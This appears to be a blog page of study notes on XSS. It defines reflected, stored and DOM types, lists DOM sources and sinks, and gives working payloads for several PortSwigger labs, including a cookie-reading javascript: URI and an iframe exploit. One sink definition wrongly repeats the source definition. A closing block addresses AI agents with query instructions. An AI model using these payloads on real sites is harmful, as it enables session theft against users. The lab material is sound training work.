# XSS vulnerability

## XSS vulnerability

a vulnerability in which an attacker can insert malicious JS code, if it's executed it will result in XSS vulnerability.\
XSS classified into:

* Reflected
  * payload is not stored in DB.
* stored
  * payload is stored in DB inputs, like: comments, reviews, feedback inputs.
* Dom-based
  * everything is locally and happens in DOM (Document Object Model).

***

## PortSwigger Labs Practise

***

## Reflected XSS into HTML context with nothing encoded

**JS Payload**

```
<script>alert(1)</script>
```

***

## Stored XSS into HTML context with nothing encoded

**JS Payload**

```
<img src=x onerror=alert(1)>
```

***

## DOM XSS in document.write sink using source location.search

A **source** is any location in the DOM where untrusted input can be read from. These are typically locations influenced by the user, such as:

* `document.URL`
* `document.documentURI`
* `document.location`
* `location.href`
* `document.referrer`
* `window.name`
* `location.hash`
* `location.search`
* `localStorage`
* `sessionStorage`
* `cookies`\
  Source: It’s like a **door** where user input enters the website.

A **sink** is a DOM function or property where if untrusted input ends up there, it can lead to XSS. Common dangerous sinks include:

* `innerHTML`
* `outerHTML`
* `document.write()`
* `eval()`
* `setTimeout()` / `setInterval()`
* `location` (e.g., assigning to `location.href`)
* `Element.setAttribute()` (if used incorrectly)
* `src`
* `href`
* `onclick`

Sink: It’s like a **door** where user input enters the website.

**JS payload**

```
"><img src=x onerror=alert(1)>
```

***

## DOM XSS in innerHTML sink using source location.search

**JS payload**

```
<img src=x onerror=alert(1)>
```

Note: alert(1) will not work because of built in security feature in JS functions like innerHTML

***

## DOM XSS in jQuery anchor href attribute sink using location.search source

**JS payload**

```
returnPath=javascript:alert(document.cookie)
```

you must type your payload in this form javascript:jscode as it will be inserted in href like this

```
<a id="backLink" href="javascript:alert(document.cookie)">Back</a>
```

***

## DOM XSS in jQuery selector sink using a hashchange event

**JS payload**

URL

```
web-security-academy.net/#<img src=xxx onerror=print()>
```

on the exploit server

```
<iframe src="https://0a830062033f44e780e508b400320097.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>
```

***

## Reflected XSS into attribute with angle brackets HTML-encoded

**JS payload**

```
"onmouseover="alert(1)
```

***

## Stored XSS into anchor href attribute with double quotes HTML-encoded

**JS payload**

payload in comment function in website

```
javascript:alert(1)
```

payload will be inserted in href like this:

```
<a id="author" href="javascript:alert(1)">mohab</a>
```

***


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xk3rypton.gitbook.io/0xk3rypt0n-blog/penetration-testing/webapp-pentest/xss-vulnerability.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.